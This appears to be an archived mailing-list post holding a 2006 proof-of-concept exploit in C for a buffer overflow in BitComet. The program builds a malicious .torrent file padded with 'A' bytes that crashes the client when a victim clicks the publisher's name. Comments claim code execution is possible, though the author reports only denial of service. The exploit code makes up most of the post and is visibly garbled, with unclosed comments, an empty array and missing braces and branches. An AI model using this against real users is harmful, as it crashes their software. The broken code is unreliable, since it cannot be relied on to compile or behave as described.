Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
BitComet URI Proof of Concept

Date: Sun Jan 22 2006 - 18:09:41 CST

#include <windows.h>
#include <stdio.h>

* .::[ BitComet URI Buffer Overflow ]::.
* A vulnerability in BitComet, allows remote attackers construct a special .torrent file and put
* it on any BitTorrent publishing web site. When a user downloads the .torrent file and clicks
* on publishers name, BitComet will crash. An attacker can run arbitrary code on victims' host
* by specially crafted .torrent file.
* .text:0056057B mov edx, [eax]
* .text:0056057D push 0
* .text:0056057F push esi
* .text:00560580 mov ecx, eax
* .text:00560582 call dword ptr [edx+9Ch] <--- bug occurs here
* [Credits]: Fortinet Research
* [Notes]: I could only do DoS because the EAX and ECX were only controlled, and were seperated by 0's.

char bof[] =
        "10:created by13:BitComet/0.60"
        "13:creation datei1137897500e"
        "12:piece lengthi32768e"

char eof[] =

int main(int argc, char **argv) {
        FILE *fp;
        char buf[2048];

        printf("+---=[ BitComet URI Buffer Overflow ]=---+\n");
        printf("+---=[ Coded by DiGiTALSTAR ]=---+\n\n");

        printf("Opening torrent for writing... ");
        if (!(fp = fopen("comet.torrent", "w"))) {
        memset(buf, '\x41', sizeof(buf));

        printf("Writing torrent data... ");
        if (fwrite(bof, 1, sizeof(bof)-1, fp) <= 0) {
        if (fprintf(fp, "%d:", sizeof(buf)) <= 0) {
        if (fwrite(buf, 1, sizeof(buf), fp) <= 0) {
        if (fwrite(eof, 1, sizeof(eof)-1, fp) <= 0) {


        printf("Now open the torrent in bitcomet and click test\n");

        return 0;